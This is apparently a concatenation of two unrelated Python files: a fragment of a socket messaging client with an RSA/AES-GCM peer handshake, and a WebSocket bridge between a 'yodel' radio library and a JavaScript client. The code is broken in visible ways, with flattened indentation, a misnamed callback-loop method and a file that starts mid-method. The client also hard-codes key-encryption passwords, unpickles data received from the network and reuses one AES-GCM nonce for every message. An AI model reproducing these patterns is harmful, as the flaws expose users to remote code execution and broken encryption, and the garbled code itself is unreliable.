self.sock.connect((address, port))
if self.__debug:
print("[Connected]")
receiver_thread = threading.Thread(target=self.__receiver)
sender_thread = threading.Thread(
target = self.__sender,
args = (self.sock, self.__SENDER_QUEUE)
)
if self.__MTCL:
callback_loop_thread_process = threading.Thread(
                target = self.__callback_loop,
args = (self.__CALLBACK_LOOP,)
)
else:
callback_loop_thread_process = multiprocessing.Process(
target = self.__callback_loop,
args = (self.__CALLBACK_LOOP,)
)
receiver_thread.daemon = True
sender_thread.daemon = True
callback_loop_thread_process.daemon = True
receiver_thread.start()
sender_thread.start()
callback_loop_thread_process.start()
if not self.__VARIFIED:
code_001_srt_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
code_001_key = code_001_srt_key.public_key()
str_code_001_key = code_001_key.public_bytes(
serialization.Encoding.OpenSSH,
serialization.PublicFormat.OpenSSH
).decode()
OBJECT = self.__serializer(
object = {"type" : "code-1.0.0-new", "username" : self.__client_name, "data" : str_code_001_key},
secure = False
)
self.sock.send(str(len(OBJECT)).center(16,"|").encode("utf-8"))
self.sock.send(OBJECT)
# self.code001_AN(
# file = self.__file_location,
# key = "code_001_srt_key",
# target_key =
# )
self.add_node(
file = self.__file_location,
node = [
# hashlib.sha256(bytes("code_001_srt_key","utf-8")).digest(),
"code_001_srt_key",
{
"status" : "unvarified",
"key" : code_001_srt_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.BestAvailableEncryption(
b'aw56hfseyinhy7fce4ser')
)
}
]
)
count_time = datetime.datetime.now() + datetime.timedelta(minutes = timeout)
while datetime.datetime.now() <= count_time and not self.__VARIFIED:
pass
if not self.__VARIFIED:
            raise TimeoutError("could not be verified by the server, try again!")
else:
OBJECT = self.__serializer(
object = {"type" : "_", "username" : self.__client_name, "data" : ""},
secure = False
)
self.sock.send(str(len(OBJECT)).center(16,"|").encode("utf-8"))
self.sock.send(OBJECT)
def __receiver(self):
while True:
if not self.__VARIFIED:
data_len = int(self.sock.recv(16).decode().strip("|"))
if not data_len:
self.sock.close()
# pair -a1.1
#need future attention----------------------------------------------------------------------
else:
recv_data = self.sock.recv(data_len)
_info = self.__load_object(
data = recv_data,
secure = False
)
# print(f"_info_ : {_info}")
# _info = {"type" = "code-0.0.1-key-res", "sender_name" : "SERVER", "data" : "encrypted aes key pack"}
if _info["type"] == "code-1.1.0-new" and _info["sender_name"] == "SERVER":
code001_key_load = self.get_node(
file = self.__file_location,
# key = hashlib.sha256(bytes("code_001_srt_key","utf-8")).digest()
key = "code_001_srt_key"
)
# print(code001_key_load)
if code001_key_load["status"] == "unvarified":
code_001_srt_key = serialization.load_pem_private_key(
data = code001_key_load["key"],
password=b'aw56hfseyinhy7fce4ser',
backend=default_backend()
)
key_pack = code_001_srt_key.decrypt(
ciphertext = _info["data"],
padding = padding.OAEP(
mgf = padding.MGF1(
algorithm = hashes.SHA256()
),
algorithm = hashes.SHA256(),
label = None
)
)
self.add_node(
file = self.__file_location,
node = [
# hashlib.sha256(bytes("code_001_srt_key","utf-8")).digest(),
"code_001_srt_key",
{
"status" : "varified",
"key" : key_pack
}
]
)
self.__KEY_STORE["code_001_srt_key"] = key_pack
OBJECT = {
"type" : "code-1.1.1-new",
"sender_name" : self.__client_name,
"target_name" : "SERVER",
"data" : hashlib.sha256(bytes("saved","utf-8")).digest()
}
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
self.__VARIFIED = True
self.add_node(
file = self.__file_location,
node=[
hashlib.sha256(
bytes("__VARIFIED", "utf-8")).digest(),
pickle.dumps(True)
]
)
else:
data_len = int(self.sock.recv(16).decode().strip("|"))
if not data_len:
self.sock.close()
# pair -a1.2
else:
recv_data = self.sock.recv(data_len)
code_002 = self.__load_object(
data = recv_data,
secure = True,
key_dict = self.__KEY_STORE
)
# code_002 = {"type" = "xyz", "bypass-pipe" : "SERVER", "sender_name" : "xyz", "target_name" : "abc", "data" : "pqr"}
# handshake counter part
if code_002["type"] == "DSP_REQ":
if code_002["target_name"] == self.__client_name:
M_code002_k_pack = {
"aes_key" : AESGCM.generate_key(256),
"nonce" : os.urandom(32),
"aad" : bytes(self.name_generator(),"utf-8"),
"approved" : True
}
normalized_M_code002_k_pack = base64.b64encode(pickle.dumps(M_code002_k_pack))
rsa_key =load_ssh_public_key(
bytes(code_002["data"],"utf-8"),
backend=default_backend()
)
ciphertext = rsa_key.encrypt(
normalized_M_code002_k_pack,
padding.OAEP(
mgf = padding.MGF1(algorithm = hashes.SHA256()),
algorithm = hashes.SHA256(),
label = None
)
)
OBJECT = {
"type" : "DSP_HR-L1",
"bypass-pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : code_002["sender_name"],
"data" : ciphertext
}
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
del M_code002_k_pack["approved"]
code001_AN_value = base64.b64encode(pickle.dumps(M_code002_k_pack))
self.code001_AN(
file = self.__file_location,
key = "key",
target_key = code_002["sender_name"],
value = ["unvarified",code001_AN_value]
)
self.__KEY_STORE[code_002["sender_name"]] = ["unvarified",code001_AN_value]
if self.__debug:
print(f"HS from : {code_002['sender_name']} | step_1 Done")
# code_002 = {"type" = "xyz", "bypass-pipe" : "SERVER", "sender_name" : "xyz", "target_name" : "abc", "data" : "pqr"}
# type DSP-HR counter part
elif code_002["type"] == "DSP_HR-L1":
if code_002["target_name"] == self.__client_name:
flatten_key = pickle.loads(base64.b64decode(self.__KEY_STORE[code_002["sender_name"]]))[1]
loaded_code_003_srt = serialization.load_pem_private_key(
data = flatten_key,
password = b'oieffjwouifh2398r29r8238h38h923h8983',
backend = default_backend()
)
__code_003_aes_srt = loaded_code_003_srt.decrypt(
ciphertext = code_002["data"],
padding = padding.OAEP(
mgf = padding.MGF1(
algorithm = hashes.SHA256()
),
algorithm = hashes.SHA256(),
label = None
)
)
__code_003_aes_srt = pickle.loads(base64.b64decode(__code_003_aes_srt))
if __code_003_aes_srt["approved"]:
OBJECT = {
"type" : "DSP_HR-L2",
"bypass-pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : code_002["sender_name"],
"data" : hashlib.sha256(bytes("approved","utf-8")).digest()
}
del __code_003_aes_srt['approved']
__code_003_aes_srt = base64.b64encode(pickle.dumps(__code_003_aes_srt))
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
self.code001_UN(
file = self.__file_location,
key = "key",
target_key = code_002["sender_name"],
position = None,
value = ["varified",__code_003_aes_srt]
)
self.__KEY_STORE[code_002["sender_name"]] = base64.b64encode(pickle.dumps(["varified",__code_003_aes_srt]))
self.HS_Devices.append(code_002["sender_name"])
print("Done")
# "DSP-HRR-L1" counter part
elif code_002["type"] == "DSP_HR-L2":
if code_002["target_name"] == self.__client_name:
if code_002["data"] == hashlib.sha256(bytes("approved","utf-8")).digest():
self.code001_UN(
file = self.__file_location,
key = "key",
target_key = code_002["sender_name"],
position = 0,
value = "varified"
)
self.__KEY_STORE[code_002["sender_name"]] = base64.b64encode(pickle.dumps(
[
"varified",
self.__KEY_STORE[code_002["sender_name"]][1]
]
)
)
self.HS_Devices.append(code_002["sender_name"])
print(f"Handshake from {code_002['sender_name']} Done")
elif code_002["type"] == "DSP_MSG":
code_004_key = self.__KEY_STORE[code_002["sender_name"]]
code_004_key = pickle.loads(base64.b64decode(code_004_key[1]))
aes_gcm = AESGCM(code_004_key["aes_key"])
decryptedtext = aes_gcm.decrypt(
nonce = code_004_key["nonce"],
data = code_002["data"],
associated_data = code_004_key["aad"]
)
data = pickle.loads(base64.b64decode(decryptedtext))
code_002["data"] = data
self.__MESSAGE_HANDLER.append(code_002)
elif code_002["type"] in self.__CUSTOM_CHANNEL:
self.__MESSAGE_HANDLER.append(code_002)
    def __sender(self, sock, __sender_queue):
        while True:
            # drain the queue from the front; popping while enumerating the
            # same list can reorder and delay pending frames
            while __sender_queue:
                data = __sender_queue.pop(0)
                sock.send(str(len(data)).center(16,"|").encode("utf-8"))
                sock.send(data)
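    # Wire-framing note (illustrative sketch, not used by the class itself):
    # every payload on this socket is preceded by a 16-byte header holding the
    # payload length centred between '|' padding characters, e.g. b'||||||1234||||||'.
    # A peer could read one frame roughly like this (names are hypothetical):
    #
    #   header = sock.recv(16)
    #   length = int(header.decode().strip("|"))
    #   payload = sock.recv(length)
    #
    # A robust reader would loop until exactly 'length' bytes have arrived,
    # since a single recv() call may return fewer bytes than requested.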
    def __callback_lopp(self,__callback_lst):
        while True:
            # run queued callbacks in FIFO order
            while __callback_lst:
                func = __callback_lst.pop(0)
                func[0](*func[1])
    def CREATE_CHANNEL(self, channels : str = None, multiple : bool = False):
        if not multiple:
            if isinstance(channels, list):
                raise ValueError("'channels' should be a string when multiple is set to False.")
            if channels not in self.__CUSTOM_CHANNEL:
                self.__CUSTOM_CHANNEL.append(channels)
        else:
            if isinstance(channels, list):
                for channel in channels:
                    if channel not in self.__CUSTOM_CHANNEL:
                        self.__CUSTOM_CHANNEL.append(channel)
            else:
                if channels not in self.__CUSTOM_CHANNEL:
                    self.__CUSTOM_CHANNEL.append(channels)
def HANDSHAKE(self,target_name : str = None):
if self.__debug:
print("Doing Handshake...")
# target_name = hashlib.sha256(target_name).digest()
try:
check = self.__KEY_STORE[target_name]
except KeyError:
check = None
        if check is not None:
            if len(check) > 0:
                if self.__debug:
                    print(f"{target_name} : already handshaked OR already has a pending handshake request.")
else:
__code_002_srt_key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend()
)
__code_002_pub_key = __code_002_srt_key.public_key()
str_code_002_pub_key = __code_002_pub_key.public_bytes(
serialization.Encoding.OpenSSH,
serialization.PublicFormat.OpenSSH
).decode()
# print(f"str_code_002_pub_key : {str_code_002_pub_key}") #===============
OBJECT = {
"type" : "DSP_REQ",
"bypass_pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : target_name,
"data" : str_code_002_pub_key
}
            normalized = self.__serializer(
                object = OBJECT,
                secure = True,
                key_dict = self.__KEY_STORE
            )
            self.__SENDER_QUEUE.append(normalized)
__code_003_srt_key_str = __code_002_srt_key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.BestAvailableEncryption(
b'oieffjwouifh2398r29r8238h38h923h8983')
)
self.code001_AN(
file = self.__file_location,
key = "key",
target_key = target_name,
value = [
"unvarified",
__code_003_srt_key_str
]
)
self.__KEY_STORE[target_name] = base64.b64encode(pickle.dumps(["unvarified",__code_003_srt_key_str]))
if self.__debug:
print("Handshake Request Send.")
def LISTEN(self,channel : str = None, function : object = None, args = None):
if not channel:
raise TypeError("LISTEN() missing 1 required positional argument: 'channel'")
else:
found = False
index = None
if channel in self.__CUSTOM_CHANNEL:
for i,d in enumerate(self.__MESSAGE_HANDLER):
if d["type"] == channel:
found = True
index = i
break
if found:
if not args:
p_data = self.__MESSAGE_HANDLER.pop(index)
self.__CALLBACK_LOOP.append([function,[p_data]])
else:
p_data = self.__MESSAGE_HANDLER.pop(index)
args = list(args)
args.insert(0,p_data)
self.__CALLBACK_LOOP.append([function,args])
    def SEND(self,channel : str = None, data = None):
        if not channel:
            raise TypeError("SEND() missing 1 required positional argument: 'channel'")
        if not data:
            raise TypeError("SEND() missing 1 required positional argument: 'data'")
        # only plain, picklable built-in types may be put on the wire
        allowed_types = (list, dict, tuple, set, str, int, float, bytes)
        if type(data) in allowed_types:
if channel in self.__CUSTOM_CHANNEL:
prepare_send_data = {
"type" : channel,
"bypass-pipe" : "SERVER",
"sender_name" : self.__client_name,
"target_name" : "SERVER",
"data" : data
}
normalized = self.__serializer(
object = prepare_send_data,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
else:
raise TypeError(f"unallowed / untransmitable type of argument 'data', {type(data)}")
    def SEND_TO_CLIENT(self, target_name : str = None, data = None):
        if not target_name:
            raise TypeError("SEND_TO_CLIENT() missing 1 required positional argument: 'target_name'")
        if not data:
            raise TypeError("SEND_TO_CLIENT() missing 1 required positional argument: 'data'")
        # only plain, picklable built-in types may be put on the wire
        allowed_types = (list, dict, tuple, set, str, int, float, bytes)
        if type(data) in allowed_types:
try:
code_004_key = self.__KEY_STORE[target_name]
except KeyError:
raise DspError(f"{target_name} is not registered/ handshaked client")
if code_004_key[0] == "varified":
__code_004_srt_key = pickle.loads(base64.b64decode(code_004_key[1]))
aes_gcm = AESGCM(__code_004_srt_key["aes_key"])
ciphertext = aes_gcm.encrypt(
nonce = __code_004_srt_key["nonce"],
data = base64.b64encode(pickle.dumps(data)),
associated_data = __code_004_srt_key["aad"]
)
OBJECT = {
"type" : "DSP_MSG",
"bypass-pipe" : "SERVER",
"target_name" : target_name,
"sender_name" : self.__client_name,
"data" : ciphertext
}
normalized = self.__serializer(
object = OBJECT,
secure = True,
key_dict = self.__KEY_STORE
)
self.__SENDER_QUEUE.append(normalized)
else:
raise TypeError(f"unallowed / untransmitable type of argument 'data', {type(data)}")
class Sclient():
def __init__(self,client_name : str = None, file : str = None, debug : bool = False, rememberServer = True, MPCL : bool = False, MTCL : bool = True):
__parent = Main(client_name,file,debug, rememberServer, MPCL,MTCL)
self.CLIENT = __parent.CLIENT
self.HS_Devices = __parent.HS_Devices
self.CREATE_CHANNEL = __parent.CREATE_CHANNEL
self.LISTEN = __parent.LISTEN
self.HANDSHAKE = __parent.HANDSHAKE
self.SEND = __parent.SEND
self.SEND_TO_CLIENT = __parent.SEND_TO_CLIENT
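# ---------------------------------------------------------------------------
# Illustrative usage sketch (assumptions: a compatible DSP server is running
# and a second client named "peerB" is connected). The client name, key-file
# path and channel name below are made up for illustration; how the
# connection itself is started (e.g. via CLIENT) is defined earlier in this
# file and only hinted at here.
if __name__ == "__main__":
    client = Sclient(client_name="peerA", file="peerA_keys", debug=True)
    # client.CLIENT(...)  # start/connect entry point exposed by the class above

    # Channel traffic is relayed by the server and delivered to LISTEN callbacks.
    client.CREATE_CHANNEL(channels="chat")
    client.SEND(channel="chat", data="hello everyone")

    def on_chat(message):
        # 'message' is the envelope popped from the internal message handler
        print("chat message:", message)

    # Direct, end-to-end encrypted traffic requires a prior handshake.
    client.HANDSHAKE(target_name="peerB")
    while True:
        client.LISTEN(channel="chat", function=on_chat)
        if "peerB" in client.HS_Devices:
            client.SEND_TO_CLIENT(target_name="peerB", data="hello peerB")
            break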
|
yodelEnvironment.py
|
from yodel.errors import YodelError
from asyncio.exceptions import CancelledError
from json.decoder import JSONDecodeError
from types import FunctionType, LambdaType
from typing import Any, Callable, NoReturn, Dict
from websockets import exceptions
from websockets.exceptions import WebSocketException
from websockets.server import WebSocketServer
import yodel
import globals
from time import sleep
import websockets
import asyncio
import json
from threading import Thread
import sys
globalstdout = sys.stdout
def forceGuiPrint(*args):
    # newline-delimit each message so the GUI can split the raw stdout stream
    globalstdout.write(' '.join(str(arg) for arg in args) + '\n')
    globalstdout.flush()
'''
Existing yodel formats are cached Format objects created by the API
'''
existingYodelFormats = []
'''
The JavaScript API uses an enum (integer codes) to represent Python types,
so their association is laid out here.
'''
apiEnumToPyType = {
0: int,
1: str,
2: bytearray,
3: yodel.Flags
}
def insulatePassYodelCall(fn, data):
    try:
        fn(data)
    except YodelError as e:
        # Any yodel related errors are sent back up to the JS client to be thrown as JS errors
        forceGuiPrint(str(e))
        globals.outgoingMessages.put(json.dumps({"name": type(e).__name__, "message": str(e)}))
'''
The following functions are designed to take in the 'kwargs' part of a JSON
request, and use them to make an yodel call with info from the call.
'''
def passYodelSendBasic(data):
'''The basic send function's kwargs are directly mapped'''
if(globals.gui):
forceGuiPrint(f"o{json.dumps(data)}")
yodel.send(data["payload"], name=data["name"], group=data["group"])
def passYodelSendSection(data):
'''
    The Section sending function's kwargs give the information needed to build and send a new section,
    e.g.: {
        payload: "...",
        fields : {
            "key" : value,
            ...
        },
        format : {
            <format data, @see passYodelNewFormat>
        },
        group: "...",
        name: "..."
    }
'''
if(globals.gui):
forceGuiPrint(f"o{json.dumps(data)}")
sectionData = data["payload"]
section = yodel.Section(passYodelNewFormat(sectionData["format"]))
for key in sectionData["fields"]:
section[key]=sectionData["fields"][key]
section.payload = (sectionData["payload"]).encode()
yodel.send(section,name=data["name"], group=data["group"])
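# A hedged example of the kwargs shape passYodelSendSection expects; the field
# names, mtype and values are illustrative only (the nested 'format' follows
# the shape accepted by passYodelNewFormat below):
_exampleSectionSendKwargs = {
    "payload": {
        "payload": "section body text",
        "fields": {"id": 7},
        "format": {
            "mtype": 2,
            "fields": [
                {"name": "id", "type": 0, "args": [], "min": 0, "max": 255, "bytes": 1}
            ]
        }
    },
    "group": "lobby",
    "name": "station-1"
}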
def passYodeljoinGroup(data) :
    '''Kwargs map directly to the call'''
yodel.joinGroup(data["group"])
def passYodelSetName(data) :
    '''Kwargs map directly to the call'''
yodel.setName(data["name"])
def passYodelNewField(data) -> yodel.Field :
'''
passYodelNewField creates a new field with the provided kwargs.
Example input:
{
name: "...",
type: 0-3,
args: [...],
min : 0->,
max : 0->,
bytes: 0->
}
'''
return yodel.Field(
data["name"],
apiEnumToPyType[int(data["type"])],
data["args"],
min=int(data["min"]),
max=int(data["max"]),
bytes=int(data["bytes"])
)
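# Hedged example of a single field description accepted by passYodelNewField
# (type 0 maps to int via apiEnumToPyType; the remaining values are illustrative):
_exampleFieldKwargs = {
    "name": "battery",
    "type": 0,
    "args": [],
    "min": 0,
    "max": 100,
    "bytes": 1
}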
def passYodelNewFormat(data) -> yodel.Format:
'''
passYodelNewFormat takes info from kwargs and generates a new yodel.Format object.
Simply calling the constructor is enough to feed the Format to the internal yodel
    functionality, but it is also cached in the API's scope through existingYodelFormats.
Fields are generated using the passYodelNewField function.
Example Input:
{
mtype: 1->,
fields: [
{
<yodel.Field data, @see passYodelNewField>
}
]
}
'''
# if this format exists already:
if data["mtype"] in existingYodelFormats:
# return existing Format definition
return yodel.globaldat.messages_types[data["mtype"]]
# If this format does not exist yet:
# add the 'mtype' type identifier to the cache list
existingYodelFormats.append(data["mtype"])
# Construct the yodel.Format by generating all the fields outlined in 'fields',
# and passing 'mtype':
return yodel.Format(
[
passYodelNewField(field) for field in data["fields"]
], mtype=int(data["mtype"]))
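# Hedged example of the kwargs accepted by passYodelNewFormat; 'mtype' and the
# field list are illustrative and reuse the field shape shown above:
_exampleFormatKwargs = {
    "mtype": 3,
    "fields": [
        {"name": "battery", "type": 0, "args": [], "min": 0, "max": 100, "bytes": 1}
    ]
}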
def passYodelleaveGroup(data) -> None:
    yodel.leaveGroup(data["group"])
def passYodelToggleRelay(data) -> None:
    yodel.toggleRelay(bool(data["relay"]))
def passYodelSetChannel(data) -> None:
    yodel.setChannel(int(data["channel"]))
# yodelResponses contains all the callbacks for the API calls.
# So, when the JS sends over a request with {'action':'setName'}, the passYodelSetName function will be called
# as is seen below.
# The typehint here just means a dictionary with string keys, and API call functions
yodelResponses: Dict[str, Callable[[Dict[Any, Any]], Any]] = {
"sendBasic" : passYodelSendBasic,
"sendSection": passYodelSendSection,
"joinGroup" : passYodeljoinGroup,
"setName" : passYodelSetName,
"createFormat" : passYodelNewFormat,
"leaveGroup" : passYodelleaveGroup,
"toggleRelay" : passYodelToggleRelay,
"setChannel" : passYodelSetChannel
}
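# Hedged example of the JSON envelope the JS client is expected to send; the
# 'action' key selects an entry from yodelResponses and 'kwargs' is passed to it:
_exampleJsonRequest = json.dumps({
    "action": "setName",
    "kwargs": {"name": "station-1"}
})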
def yodelLoop() -> NoReturn:
'''
The yodelLoop is responsible for listening to yodel connections in its own thread.
'''
while True:
# Try wrapper for stability. Errors will still be printed for debugging.
try:
            # check for incoming messages from the local yodel. (Non-blocking)
raw:yodel.Section = yodel.listen()
# if a message was found
if raw is not None:
                # Use yodel's automatic decoding functionality to automatically determine the fields etc... of the message
raw = yodel.autoDecode(raw)
# if the autoDecoded value is not bytes, it must be a Section object.
if not isinstance(raw, bytes):
raw = {"fields":raw.fields, "mtype":raw.format.mtype, "payload":raw.payload.decode()}
                # otherwise, the autoDecoded value is raw bytes, so just decode the payload into a string.
else:
raw = {"payload":raw.decode()}
# the message sent back to the JS has action of 'incoming' to show that it is a new message
# and the kwargs contain either the payload of a raw message,
# or the relevant section data of an encoded message.
message = json.dumps(
{
"action":"incoming",
"kwargs":raw
}
)
if(globals.gui):
forceGuiPrint(f"i{json.dumps(raw)}")
# The message (which is now just a string) can now be added to the global Queue
# where it will be picked up from the WebSocket thread, and sent to the JS.
globals.outgoingMessages.put(message)
        except YodelError as e:
            # Any yodel related errors are sent back up to the JS client to be thrown as JS errors
            forceGuiPrint(str(e))
            globals.outgoingMessages.put(json.dumps({"name": type(e).__name__, "message": str(e)}))
async def checkIncomingJSON(sock:websockets.server.WebSocketServerProtocol) -> None:
'''
checkIncomingJSON waits for a new command from the JS client, and then activates the appropriate
yodelResponse.
@see yodelResponses
'''
# This is the main blocking call that needs to be timed out.
try:
# check for incoming requests from JS, timeout after 0.1 seconds
jsonRequest = await asyncio.shield( asyncio.wait_for( sock.recv(), 0.1) )
except CancelledError:
return
except asyncio.exceptions.TimeoutError:
return
    try:
        jsonRequest = json.loads(jsonRequest)
    except json.JSONDecodeError as e:
        forceGuiPrint(str(e))
        return
    action = jsonRequest["action"]
kwargs = jsonRequest["kwargs"]
#forceGuiPrint(jsonRequest)
#if ('channel' in kwargs):
# yodel.setChannel(int(kwargs["channel"]))
insulatePassYodelCall(yodelResponses[action],kwargs)
async def checkOutgoingJSON(sock:websockets.server.WebSocketServerProtocol) -> None:
'''
checkOutgoingJSON checks the global Queue for messages that are ready to be sent back to the JS client.
'''
if (globals.outgoingMessages.empty()):
return
await sock.send(
globals.outgoingMessages.get()
)
async def yodelSuite(sock:websockets.server.WebSocketServerProtocol, path):
'''
yodelSuite just combines the functionality of incoming and outgoing JSON coroutines
'''
# Client loop:
while True:
# check for any ready incoming messages from the JS
await checkIncomingJSON(sock)
# check for any ready outgoing messages to the JS
await checkOutgoingJSON(sock)
def beginServing():
'''
Basic setup for the WebSocket server, yodel, and a thread
'''
forceGuiPrint("Binding to port: ", globals.port)
# This combination will allow the websocket server to run on the asyncio
# event loop, and feed new connections through to the yodelSuite coroutine
asyncio.get_event_loop().run_until_complete(
websockets.serve(yodelSuite, globals.host, globals.port)
)
# Setup yodel with the radio device
yodel.startRadio(globals.yodelStartRadio)
# Yodel will be operated through its own thread because it doesn't play nice with asyncio.
# Yodel data is accepted in this thread, and given to the websocket thread through a global Queue
yodelThread = Thread(target=yodelLoop, daemon=True)
yodelThread.start()
# mainloop
asyncio.get_event_loop().run_forever()
    # unreachable: run_forever() blocks until the event loop is stopped
yodelThread.join()
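# Hedged entry-point sketch: how this module might be launched when run
# directly. Host, port and radio settings come from the 'globals' module,
# whose contents are assumed here.
if __name__ == "__main__":
    beginServing()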
|